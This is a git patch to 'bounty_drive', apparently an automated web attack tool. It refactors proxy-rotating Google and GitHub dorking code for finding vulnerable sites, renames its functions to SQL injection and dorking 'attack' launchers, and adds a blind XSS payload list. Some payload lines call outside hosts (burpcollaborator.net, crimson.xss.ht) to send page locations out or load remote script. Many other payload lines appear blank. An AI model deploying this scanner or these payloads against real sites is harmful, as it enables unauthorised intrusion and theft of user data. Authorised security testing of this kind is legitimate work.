From 8da788faf994afc123dd18025f1bcc68881691db Mon Sep 17 00:00:00 2001 From: ElNiak Date: Thu, 20 Jun 2024 07:48:40 +0200 Subject: [PATCH] add documentation and change result (todo) --- bounty_drive/attacks/dorks/dorking_config.py | 6 - bounty_drive/attacks/dorks/github_config.py | 11 - bounty_drive/attacks/dorks/github_dorking.py | 11 +- bounty_drive/attacks/dorks/google_dorking.py | 280 +- bounty_drive/attacks/sqli/sqli.py | 2 +- .../xss/payloads/blind-xss-payload-list.txt | 27 + .../xss/payloads/dom-xss-payload-list.txt | 6613 +++++++++++++++++ bounty_drive/attacks/xss/xss.py | 447 +- bounty_drive/attacks/xss/xss_cve.py | 66 + bounty_drive/attacks/xss/xss_striker.py | 220 +- bounty_drive/bounty_drive.py | 93 +- bounty_drive/bypasser/waf_mitigation.py | 16 +- bounty_drive/configs/config.ini | 21 +- bounty_drive/reporting/results_manager.py | 30 +- bounty_drive/requester/request_manager.py | 43 + bounty_drive/vpn_proxies/proxies_manager.py | 50 + bounty_drive/vpn_proxies/vpn_manager.py | 8 + 17 files changed, 7554 insertions(+), 390 deletions(-) delete mode 100644 bounty_drive/attacks/dorks/dorking_config.py delete mode 100644 bounty_drive/attacks/dorks/github_config.py create mode 100644 bounty_drive/attacks/xss/payloads/blind-xss-payload-list.txt create mode 100644 bounty_drive/attacks/xss/payloads/dom-xss-payload-list.txt diff --git a/bounty_drive/attacks/dorks/dorking_config.py b/bounty_drive/attacks/dorks/dorking_config.py deleted file mode 100644 index 310611d..0000000 --- a/bounty_drive/attacks/dorks/dorking_config.py +++ /dev/null @@ -1,6 +0,0 @@ -class DorkingConfig: - SUBDOMAIN = [] # TODO use target.txt and allow multiple domain - CRAWL = False - - -dorking_config = DorkingConfig() diff --git a/bounty_drive/attacks/dorks/github_config.py b/bounty_drive/attacks/dorks/github_config.py deleted file mode 100644 index 6147dc0..0000000 --- a/bounty_drive/attacks/dorks/github_config.py +++ /dev/null @@ -1,11 +0,0 @@ 
-######################################################################################### -# Global variables -######################################################################################### - -# GitHub Dorking -GITHUB_API_URL = "https://api.github.com" -TOKENS_LIST = ["your_github_token"] # Add your GitHub tokens here -DORK_LIST = ["example_dork1", "example_dork2"] # Add your dorks here -QUERIES_LIST = ["example_query"] # Add your queries here -ORGANIZATIONS_LIST = ["example_organization"] # Add your organizations here -USERS_LIST = ["example_user"] # Add your users here diff --git a/bounty_drive/attacks/dorks/github_dorking.py b/bounty_drive/attacks/dorks/github_dorking.py index 3bae243..0436165 100644 --- a/bounty_drive/attacks/dorks/github_dorking.py +++ b/bounty_drive/attacks/dorks/github_dorking.py @@ -11,11 +11,18 @@ import requests from termcolor import cprint -from attacks.dorks.github_config import GITHUB_API_URL, TOKENS_LIST from utils.app_config import * token_index = 0 +# GitHub Dorking +GITHUB_API_URL = "https://api.github.com" +TOKENS_LIST = ["your_github_token"] # Add your GitHub tokens here +DORK_LIST = ["example_dork1", "example_dork2"] # Add your dorks here +QUERIES_LIST = ["example_query"] # Add your queries here +ORGANIZATIONS_LIST = ["example_organization"] # Add your organizations here +USERS_LIST = ["example_user"] # Add your users here + def token_round_robin(): global token_index @@ -105,5 +112,5 @@ def github_search_with_proxy(dork_tuple, proxy, category, retries=3, advanced=Fa return category, None # Indicate failure after retries -# def load_github_dorks_and_search(extension=DEFAULT_EXTENSION, total_output=DEFAULT_TOTAL_OUTPUT, page_no=DEFAULT_PAGE_NO, proxies=None): +# def launch_github_dorks_and_search_attack(extension=DEFAULT_EXTENSION, total_output=DEFAULT_TOTAL_OUTPUT, page_no=DEFAULT_PAGE_NO, proxies=None): # pass diff --git a/bounty_drive/attacks/dorks/google_dorking.py b/bounty_drive/attacks/dorks/google_dorking.py 
index 1d33cc8..47d1b59 100644 --- a/bounty_drive/attacks/dorks/google_dorking.py +++ b/bounty_drive/attacks/dorks/google_dorking.py @@ -19,9 +19,13 @@ from scraping.web_scraper import parse_google_search_results, render_js_and_get_text -from vpn_proxies.proxies_manager import prepare_proxies, round_robin_proxies +from vpn_proxies.proxies_manager import get_proxies_and_cycle, prepare_proxies from requester.request_manager import param_converter, start_request -from reporting.results_manager import get_processed_dorks, safe_add_result +from reporting.results_manager import ( + get_processed_dorks, + save_dorking_query, + google_dorking_results, +) dork_id_lock = threading.Lock() @@ -37,6 +41,29 @@ def google_search_with_proxy( advanced=False, dork_id=0, ): + """Performs a Google search using a proxy. + + This function takes in various parameters to perform a Google search using a proxy. + It generates a full query based on the provided dork query, config, and domain. + It prepares the necessary parameters and proxies, and then performs the search using the `perform_searches` function. + + Args: + dork_query (str): The dork query to be used for the Google search. + proxy (str): The proxy to be used for the Google search. + category (str): The category of the search. + config (dict): The configuration file. + domain (str): The domain to be searched. + processed_dorks (list): A list of processed dorks. + retries (int, optional): The number of retries for the search. Defaults to 1. + advanced (bool, optional): Whether to use advanced search options. Defaults to False. + dork_id (int, optional): The ID of the dork. Defaults to 0. + + Raises: + Exception: If the config file is not provided. + + Returns: + dict: The search results. + """ if not config: raise Exception("Config file should be provided") @@ -82,6 +109,26 @@ def perform_searches( processed_dorks, use_session, ): + """Perform searches using Google dorking. 
+ + This function performs searches using Google dorking technique. It takes various parameters + to customize the search query and behavior. + + Args: + full_query (str): The full search query. + proxies (dict): A dictionary of proxies to be used for the search. + category (str): The category of the search. + params (dict): Additional parameters for the search. + retries (int): The number of retries in case of failure. + config (dict): Configuration settings for the search. + advanced (bool): Flag indicating whether to use advanced search techniques. + dork_id (int): The ID of the dork. + processed_dorks (list): A list of processed dorks. + use_session (bool): Flag indicating whether to use session for the search. + + Returns: + int: The ID of the executed search. + """ params["q"] = full_query dork_id = execute_search_with_retries( @@ -112,6 +159,24 @@ def execute_search_with_retries( processed_dorks, use_session=False, ): + """ + Execute a search with retries using Google dorking. + + Args: + query (str): The search query. + proxies (dict): The proxies to be used for the request. + category (str): The category of the search. + params (dict): The parameters for the request. + retries (int): The number of retries. + config (dict): The configuration settings. + advanced (bool): Whether to use advanced search techniques. + dork_id (int): The ID of the dork. + processed_dorks (list): The list of already processed dorks. + use_session (bool, optional): Whether to use a session for the request. Defaults to False. + + Returns: + int: The updated dork ID. 
+ """ base_url = "https://www.google.com/search" headers = { "User-Agent": random.choice(USER_AGENTS), @@ -207,7 +272,9 @@ def execute_search_with_retries( proxies, advanced, query, html_content ) result = dork_id, category, urls, query - safe_add_result(result, config) + # save_dorking_query(result, config) + with dork_id_lock: + google_dorking_results.append((result, config)) # with dork_id_lock: # dork_id += 1 # TODO to be faster also record non functionnal dork @@ -250,6 +317,23 @@ def execute_search_with_retries( def generate_dork_query(query, config, domain): + """Generate a dork query for Google dorking. + + This function takes a query, configuration, and domain as input and generates a dork query + for Google dorking. It cleans up the query by removing existing inurl: and intext: tags, + ensures the query is properly enclosed in quotes if it contains quotes, and incorporates + the subdomain into the search query if specified. It also appends the file extension to the + query if specified in the configuration. + + Args: + query (str): The query string. + config (dict): The configuration settings. + domain (str): The domain to incorporate into the search query. + + Returns: + str: The generated dork query. + + """ # Clean up the query by removing existing inurl: and intext: tags if len(query) > 0: for tag in ["inurl:", "intext:"]: @@ -291,6 +375,14 @@ def generate_dork_query(query, config, domain): def filter_search_tasks(search_tasks, processed_dorks): """ Filters out the already processed dorks from search tasks. + + Args: + search_tasks (dict): A dictionary containing search tasks categorized by their respective categories. + processed_dorks (list): A list of already processed dorks. + + Returns: + dict: A dictionary containing filtered search tasks with the already processed dorks removed. 
+ """ filtered_tasks = {} for category, dorks in search_tasks.items(): @@ -300,97 +392,113 @@ def filter_search_tasks(search_tasks, processed_dorks): return filtered_tasks -def load_google_dorks_and_search(config, categories): - proxies, proxy_cycle = get_proxies_and_cycle(config) +def launch_google_dorks_and_search_attack(config, categories): + """Launches a Google dorks and search attack. - search_tasks = {} + This function takes a configuration object and a list of categories as input. + It performs a Google dorks search for each category and launches a search attack + using the obtained dorks. - for category in categories: - search_tasks[category] = [] - dork_files = glob.glob(f"attacks/dorks/google/{category}/*.txt", recursive=True) - for dork_file in dork_files: - with open(dork_file, "r") as file: - lines = file.readlines() - dorks = [line.strip() for line in lines] - search_tasks[category] += dorks + Args: + config (dict): A configuration object containing various settings for the attack. + categories (list): A list of categories to perform the search attack on. - cprint( - f"Total number of dorks: {sum([len(search_tasks[task]) for task in search_tasks])}", - "yellow", - file=sys.stderr, - ) - processed_dorks = get_processed_dorks(config) + Raises: + NotImplementedError: If VPN is enabled in the configuration, as VPN is not supported in this version. + Exception: If any other error occurs during the search attack. 
- if not search_tasks: - cprint(f"No dorks to process.", "red", file=sys.stderr) - return + Returns: + None + """ + try: + proxies, proxy_cycle = get_proxies_and_cycle(config) - if config["use_vpn"]: - raise NotImplementedError( - "VPN is not supported in this version - Error in library" - ) - thread = threading.Thread(target=change_vpn) - thread.start() - - number_of_worker = min(len(proxies), 30) - cprint(f"Number of workers: {number_of_worker}", "yellow", file=sys.stderr) - - search_tasks_with_proxy = [] - for task in search_tasks: - for domain in config["subdomain"]: - for dork in search_tasks[task]: - proxy = next(proxy_cycle) - search_tasks_with_proxy.append( - {"dork": dork, "proxy": proxy, "category": task, "domain": domain} - ) - cprint( - f"Total number of dorks: {len(search_tasks_with_proxy)}", - "yellow", - file=sys.stderr, - ) + search_tasks = {} + + for category in categories: + search_tasks[category] = [] + dork_files = glob.glob( + f"attacks/dorks/google/{category}/*.txt", recursive=True + ) + for dork_file in dork_files: + with open(dork_file, "r") as file: + lines = file.readlines() + dorks = [line.strip() for line in lines] + search_tasks[category] += dorks - with concurrent.futures.ThreadPoolExecutor( - max_workers=number_of_worker - ) as executor: - future_to_search = { - executor.submit( - google_search_with_proxy, - task["dork"], - task["proxy"], - task["category"], - config, - task["domain"], - processed_dorks, - ): task - for task in search_tasks_with_proxy - } - for future in tqdm( - concurrent.futures.as_completed(future_to_search), - total=len(future_to_search), - desc="Searching for vulnerable website", - unit="site", - ): - # task = future_to_search[future] - # try: - future.result() - - -def get_proxies_and_cycle(config): - proxies = config["proxies"] - if config["use_proxy"] and len(proxies) == 0: cprint( - f"Using proxies -> you should have at least one UP", - "red", + f"Total number of dorks: {sum([len(search_tasks[task]) for task 
in search_tasks])}", + "yellow", file=sys.stderr, ) - exit() + processed_dorks = get_processed_dorks(config) - if not config["use_proxy"]: - proxies = [None] + if not search_tasks: + cprint(f"No dorks to process.", "red", file=sys.stderr) + return + + if config["use_vpn"]: + raise NotImplementedError( + "VPN is not supported in this version - Error in library" + ) + thread = threading.Thread(target=change_vpn) + thread.start() + + number_of_worker = min(len(proxies), 30) + cprint(f"Number of workers: {number_of_worker}", "yellow", file=sys.stderr) + + search_tasks_with_proxy = [] + for task in search_tasks: + for domain in config["subdomain"]: + for dork in search_tasks[task]: + proxy = next(proxy_cycle) + search_tasks_with_proxy.append( + { + "dork": dork, + "proxy": proxy, + "category": task, + "domain": domain, + } + ) + cprint( + f"Total number of dorks: {len(search_tasks_with_proxy)}", + "yellow", + file=sys.stderr, + ) - proxy_cycle = round_robin_proxies(proxies) - return proxies, proxy_cycle - # update_csv(config["experiment_file_path"], task, success=True) - # except Exception as e: - # cprint(f"Error processing {task['dork']}: {e}", "red", file=sys.stderr) - # # update_csv(config["experiment_file_path"], task, success=False) + with concurrent.futures.ThreadPoolExecutor( + max_workers=number_of_worker + ) as executor: + future_to_search = { + executor.submit( + google_search_with_proxy, + task["dork"], + task["proxy"], + task["category"], + config, + task["domain"], + processed_dorks, + ): task + for task in search_tasks_with_proxy + } + for future in tqdm( + concurrent.futures.as_completed(future_to_search), + total=len(future_to_search), + desc="Searching for vulnerable website", + unit="site", + ): + future.result() + except KeyboardInterrupt: + cprint( + "Process interrupted by user during google dorking phase ... 
Saving results", + "red", + file=sys.stderr, + ) + concurrent.futures.thread._threads_queues.clear() + # https://stackoverflow.com/questions/49992329/the-workers-in-threadpoolexecutor-is-not-really-daemon + for result, config in google_dorking_results: + save_dorking_query(result, config) + quit() + except Exception as e: + cprint(f"Error searching for dorks: {e}", "red", file=sys.stderr) + raise e diff --git a/bounty_drive/attacks/sqli/sqli.py b/bounty_drive/attacks/sqli/sqli.py index cba89de..9ebb3f3 100644 --- a/bounty_drive/attacks/sqli/sqli.py +++ b/bounty_drive/attacks/sqli/sqli.py @@ -96,7 +96,7 @@ def test_sqli_with_proxy(url_proxy): return url, vuln # Error or can't determine -def test_vulnerability_sqli(proxies): +def launch_sqli_attack(proxies): """ Test a list of websites for SQL injection vulnerability using multithreading and proxies. """ diff --git a/bounty_drive/attacks/xss/payloads/blind-xss-payload-list.txt b/bounty_drive/attacks/xss/payloads/blind-xss-payload-list.txt new file mode 100644 index 0000000..109fc38 --- /dev/null +++ b/bounty_drive/attacks/xss/payloads/blind-xss-payload-list.txt @@ -0,0 +1,27 @@ +'"> +'"> +'"> +'"> +'"> +'"> +'"> +'"> +'"> +'"> + +'"> +'"> +'"> +'"> +javascript:window.location="https://example.burpcollaborator.net/js-scheme?"+btoa(document.location) +javascript:fetch("https://example.burpcollaborator.net/js-scheme-fetch?"+btoa(document.location)) + +'> +"> +javascript:eval('var a=document.createElement(\'script\');a.src=\'https://crimson.xss.ht\';document.body.appendChild(a)') +"> +"> +">